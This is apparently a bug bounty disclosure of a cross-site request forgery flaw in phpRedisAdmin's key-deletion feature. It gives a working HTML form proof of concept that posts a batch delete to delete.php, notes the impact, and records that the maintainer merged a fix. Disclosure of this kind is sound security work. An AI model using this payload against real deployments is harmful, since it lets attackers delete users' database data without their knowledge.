Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin

Valid

Reported on

Aug 23rd 2021


✍️ Description

The delete key functionality in the application is vulnerable to CSRF attack.

🕵️‍♂️ Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://domain.tld/phpRedisAdmin/delete.php?s=1&d=0&batch_del=1" method="POST">
      <input type="hidden" name="post" value="1" />
      <input type="hidden" name="selected&#95;keys" value="123&#44;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability can let an attacker delete data from the database without the knowledge/interaction of the user.

Occurences

We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 3 months ago
Erik Dubbelboer confirmed that a fix has been merged on b57e3b 3 months ago
The fix bounty has been dropped